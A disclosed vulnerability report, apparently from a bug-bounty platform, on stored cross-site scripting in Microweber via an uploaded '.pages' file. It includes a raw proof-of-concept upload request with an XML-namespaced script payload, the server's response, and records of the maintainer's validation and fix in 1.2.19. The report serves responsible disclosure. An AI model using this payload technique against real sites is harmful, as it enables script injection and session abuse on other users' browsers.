Cross-site scripting - Stored via upload ".pages" file in microweber/microweber

Valid

Reported on

Jul 2nd 2022

Description

In file upload function, the server allow upload .pages file with contain some javascript code lead to XSS.

Proof of Concept

REQUEST:

POST /demo/plupload HTTP/1.1
Host: demo.microweber.org
Cookie: laravel_session=r768Tqzv8h0fkjgvKdofhxgmjcorT6pwuqMKJkIb; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; back_to_admin=https%3A//demo.microweber.org/demo/admin/view%3Ashop/action%3Aproducts%23action%3Dnew%3Aproduct; csrf-token-data=%7B%22value%22%3A%22YbSQ8rVR4gKnhlneQm7raooqI7YrB7VZJGH6lLJX%22%2C%22expiry%22%3A1656778667013%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------80883503232369887683205133266
Content-Length: 961
Origin: https://demo.microweber.org
Referer: https://demo.microweber.org/demo/admin/view:shop/action:products
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Pwnfox-Color: red
Te: trailers
Connection: close

-----------------------------80883503232369887683205133266
Content-Disposition: form-data; name="name"

xss_poc.pages
-----------------------------80883503232369887683205133266
Content-Disposition: form-data; name="chunk"

0
-----------------------------80883503232369887683205133266
Content-Disposition: form-data; name="chunks"

1
-----------------------------80883503232369887683205133266
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream

<?xml version="1.0" encoding="UTF-8"?>
<html>
    <head></head>
    <body>
        <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(window.origin)</a:script>
        <info>
          <name>
            <value>123</value>
          </name>
            <description>
              <value>Hello</value>
            </description>
            <url>
              <value>http://google.com</value>
            </url>
        </info>
    </body>
</html>
-----------------------------80883503232369887683205133266--

RESPONSE:

HTTP/1.1 200 OK
Date: Sat, 02 Jul 2022 16:10:19 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sat, 02 Jul 2022 16:10:19 GMT
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json
Content-Length: 133

{"src":"https:\/\/demo.microweber.org\/demo\/userfiles\/media\/default\/xss-poc.pages","name":"xss-poc.pages","bytes_uploaded":"961"}

Poc Image

Impact

This vulnerability can be arbitrarily executed javascript code to perform HTTP request, CSRF, get content of same origin page, etc ...

Occurrences

Files.php L1161

References

https://owasp.org/www-project-top-ten/2017/A7_2017-Cross-Site_Scripting_(XSS)

We are processing your report and will contact the microweber team within 24 hours. a year ago

We have contacted a member of the microweber team and are waiting to hear back a year ago

Peter Ivanov validated this vulnerability a year ago

Nhien.IT has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Peter Ivanov marked this as fixed in 1.2.19 with commit 70b46e a year ago

Peter Ivanov has been awarded the fix bounty

This vulnerability will not receive a CVE

Files.php#L1161 has been validated

to join this conversation